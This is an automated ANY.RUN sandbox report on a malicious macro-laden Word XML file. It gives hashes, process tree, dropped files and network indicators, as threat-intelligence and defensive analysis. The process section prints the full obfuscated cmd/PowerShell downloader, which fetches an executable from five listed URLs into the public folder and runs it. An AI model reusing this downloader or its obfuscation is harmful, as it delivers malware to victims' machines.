analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

18_Januar_2019_3693877020.doc

Full analysis: https://app.any.run/tasks/c9e0cc5a-3e5e-438a-aeb2-104d6a1f9a61
Verdict: Malicious activity
Analysis date: January 18, 2019, 09:49:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

B839DB2BB8F5879B253E47280ABFC082

SHA1:

E6907939D810F71E1456E28B0A268ABF2D4F0B6C

SHA256:

BB8BD5A99400F510B9CA12ECD9EE672AAFBD484013A39DDF4A556D3997AD276A

SSDEEP:

3072:jDX920f/bSvGff0dvqr+/iNKDzaJFUKc0UTE7yZRUV7RJeOzi8E:d2KS+RSaEDzYUTE7yZRVUi8E

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2648)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2648)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 2988)
    • Creates files in the user directory

      • powershell.exe (PID: 2512)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3956)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2648)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2648)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:18 06:57:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:18 06:57:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: 12
WordDocumentDocumentPropertiesCharacters: 73
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 84
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: (Binary data 65916 bytes, use -b option to extract)
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 003E487C
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 003E487C
WordDocumentBodySectPRRsidRPr: 00B901C0
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 111550 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:115.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRT:
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start msoxmled.exe no specs winword.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2988"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\18_Januar_2019_3693877020.doc.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
2648"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\18_Januar_2019_3693877020.doc.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3956c:\FantasticPlasticBallhn28\Intelligentv66\Takaj42\..\..\..\windows\system32\cmd.exe /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $MalaysianRinggitv64='Drivesp88';$Avonuw65=new-object Net.WebClient;$ArmenianDramp86='http://easyaccesshs.com/WYPsCYUe_89F0oV@http://dowseservices.com/Cna7kt_HtIAD2LqT_rXDH9b@http://www.immo-en-israel.com/mP7mhva_1xVx_6tOstw7@http://www.giancarlopuppo.com/tmp/3JBXN3_NmitWLk37_trb2wuQ@http://kcpaving.co.za/vTzd_4jLXhB6AV'.Split('@');$Woodenzv78='abilityak36';$Nevadaoq74 = '977';$Bedfordshiref76='Concretek63';$yellowz96=$env:public+'\'+$Nevadaoq74+'.exe';foreach($Omanp5 in $ArmenianDramp86){try{$Avonuw65.DownloadFile($Omanp5, $yellowz96);$Buckinghamshireqh53='arrayli8';If ((Get-Item $yellowz96).length -ge 80000) {Invoke-Item $yellowz96;$Skyways98='AutomotiveSportsmp23';break;}}catch{}}$WestVirginiaz96='IncredibleFreshShoesp44';c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2512powershell $MalaysianRinggitv64='Drivesp88';$Avonuw65=new-object Net.WebClient;$ArmenianDramp86='http://easyaccesshs.com/WYPsCYUe_89F0oV@http://dowseservices.com/Cna7kt_HtIAD2LqT_rXDH9b@http://www.immo-en-israel.com/mP7mhva_1xVx_6tOstw7@http://www.giancarlopuppo.com/tmp/3JBXN3_NmitWLk37_trb2wuQ@http://kcpaving.co.za/vTzd_4jLXhB6AV'.Split('@');$Woodenzv78='abilityak36';$Nevadaoq74 = '977';$Bedfordshiref76='Concretek63';$yellowz96=$env:public+'\'+$Nevadaoq74+'.exe';foreach($Omanp5 in $ArmenianDramp86){try{$Avonuw65.DownloadFile($Omanp5, $yellowz96);$Buckinghamshireqh53='arrayli8';If ((Get-Item $yellowz96).length -ge 80000) {Invoke-Item $yellowz96;$Skyways98='AutomotiveSportsmp23';break;}}catch{}}$WestVirginiaz96='IncredibleFreshShoesp44';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 706
Read events
1 310
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2648WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRED61.tmp.cvr
MD5:
SHA256:
2648WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD557023.jpg
MD5:
SHA256:
2512powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O5BJXW85JW11PWVG2D8F.temp
MD5:
SHA256:
2512powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f541.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2512powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2648WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:3F17B04D33BD6DB5054765818DDC691A
SHA256:44D55192D8D01C60568610A9977D8AF0C6F7552BCF6160B749DC1E695EB8B646
2648WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$_Januar_2019_3693877020.doc.xmlpgc
MD5:2E3F6A0C4D4A77A592AE45C04CFDB4DA
SHA256:7589A6AFB9D77F71815BDBB914011650BF7E321DD9E6FF6FA868E2E23A2E3AE4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2512
powershell.exe
GET
404
129.232.138.186:80
http://easyaccesshs.com/WYPsCYUe_89F0oV
ZA
xml
345 b
suspicious
2512
powershell.exe
GET
404
87.98.154.146:80
http://www.immo-en-israel.com/mP7mhva_1xVx_6tOstw7
FR
xml
345 b
malicious
2512
powershell.exe
GET
404
77.68.64.18:80
http://dowseservices.com/Cna7kt_HtIAD2LqT_rXDH9b
GB
xml
345 b
suspicious
2512
powershell.exe
GET
404
181.225.136.90:80
http://www.giancarlopuppo.com/tmp/3JBXN3_NmitWLk37_trb2wuQ
AR
xml
345 b
unknown
2512
powershell.exe
GET
404
196.22.132.186:80
http://kcpaving.co.za/vTzd_4jLXhB6AV
ZA
xml
345 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2512
powershell.exe
77.68.64.18:80
dowseservices.com
1&1 Internet SE
GB
suspicious
2512
powershell.exe
129.232.138.186:80
easyaccesshs.com
HETZNER
ZA
suspicious
2512
powershell.exe
87.98.154.146:80
www.immo-en-israel.com
OVH SAS
FR
malicious
2512
powershell.exe
181.225.136.90:80
www.giancarlopuppo.com
Internap Network Services Corporation
AR
unknown
2512
powershell.exe
196.22.132.186:80
kcpaving.co.za
HETZNER
ZA
unknown

DNS requests

Domain
IP
Reputation
easyaccesshs.com
  • 129.232.138.186
suspicious
dowseservices.com
  • 77.68.64.18
suspicious
www.immo-en-israel.com
  • 87.98.154.146
malicious
www.giancarlopuppo.com
  • 181.225.136.90
unknown
kcpaving.co.za
  • 196.22.132.186
unknown

Threats

No threats detected
No debug info